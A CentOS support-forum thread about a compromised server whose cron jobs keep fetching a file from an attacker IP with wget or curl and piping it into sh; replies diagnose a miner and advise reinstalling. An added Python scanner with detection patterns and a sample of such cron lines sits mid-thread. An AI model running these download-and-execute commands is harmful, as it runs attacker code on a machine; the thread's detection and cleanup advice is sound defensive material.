Infected cron tasks

Support for security such as Firewalls and securing linux
jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

Infected cron tasks

Post by jrguzman23 » 2017/10/24 16:44:33

Problems with crontab tasks.

Good day.

I have problems with a CentOS server where the cron tasks are restored and the following tasks are created.
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server. :?

TrevorH
Site Admin
Posts: 33202
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: Infected cron tasks

Post by TrevorH » 2017/10/24 17:04:23

If that is root's crontab then you need to back up your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.

The code there appears to be a bitcoin miner.

You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
The future appears to be RHEL or Debian. I think I'm going Debian.
Info for USB installs on http://wiki.centos.org/HowTos/InstallFromUSBkey
CentOS 5 and 6 are deadest, do not use them.
Use the FAQ Luke
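
A triage check for the persistence pattern reported in this thread (a cron entry that downloads a file and pipes it into a shell), usable when inspecting restored data or other hosts. This is an added example, not code from any poster; the sample crontab is constructed, uses a documentation address (192.0.2.10) and well-formed cron syntax, and the scanned paths are the usual CentOS cron locations.

```python
import glob
import re

# A download tool followed by a URL, then (later on the line) a pipe into a shell.
FETCH = re.compile(r"\b(wget|curl)\b[^|;&]*?(https?://[^\s|;&'\"]+)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z|k)?sh\b")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. MAILTO=root
CRON_GLOBS = ("/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/*")

# Constructed sample modelled on the entries reported in the thread.
SAMPLE = """\
# constructed sample
MAILTO=root
*/26 * * * * wget -O - -q http://192.0.2.10/langs/logo.jpg|sh
*/25 * * * * curl http://192.0.2.10/langs/logo.jpg | /bin/bash
0 3 * * * curl -s https://example.org/b.tgz -o /tmp/b.tgz && sha256sum /tmp/b.tgz
30 2 * * * /usr/bin/rsync -a /srv/ /backup/
"""

def suspicious_cron_entries(text, source="<input>"):
    """Return one finding per cron line that fetches a URL and pipes it to a shell."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # blank line, comment, or environment assignment
        fetch = FETCH.search(line)
        if fetch and PIPE_TO_SHELL.search(line, fetch.end()):
            findings.append({"source": source, "line": lineno,
                             "tool": fetch.group(1).lower(),
                             "url": fetch.group(2), "entry": line})
    return findings

def scan_system(globs=CRON_GLOBS):
    """Scan the cron files matched by globs; unreadable paths are skipped."""
    findings = []
    for pattern in globs:
        for path in glob.glob(pattern):
            try:
                with open(path, errors="replace") as fh:
                    findings += suspicious_cron_entries(fh.read(), path)
            except OSError:
                continue  # needs root, or the path is a directory
    return findings

if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE, "SAMPLE") + scan_system():
        print(f"{f['source']}:{f['line']}: {f['tool']} -> {f['url']}")
```

A hit helps scope which hosts or backups carry the same entry; an empty result says nothing about other backdoors on a root-compromised system.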

avij
Retired Moderator
Posts: 3046
Joined: 2010/12/01 19:25:52
Location: Helsinki, Finland

Re: Infected cron tasks

Post by avij » 2017/10/24 17:16:43

For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.

jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

Re: Infected cron tasks

Post by jrguzman23 » 2017/10/24 18:43:38

Thank you very much.
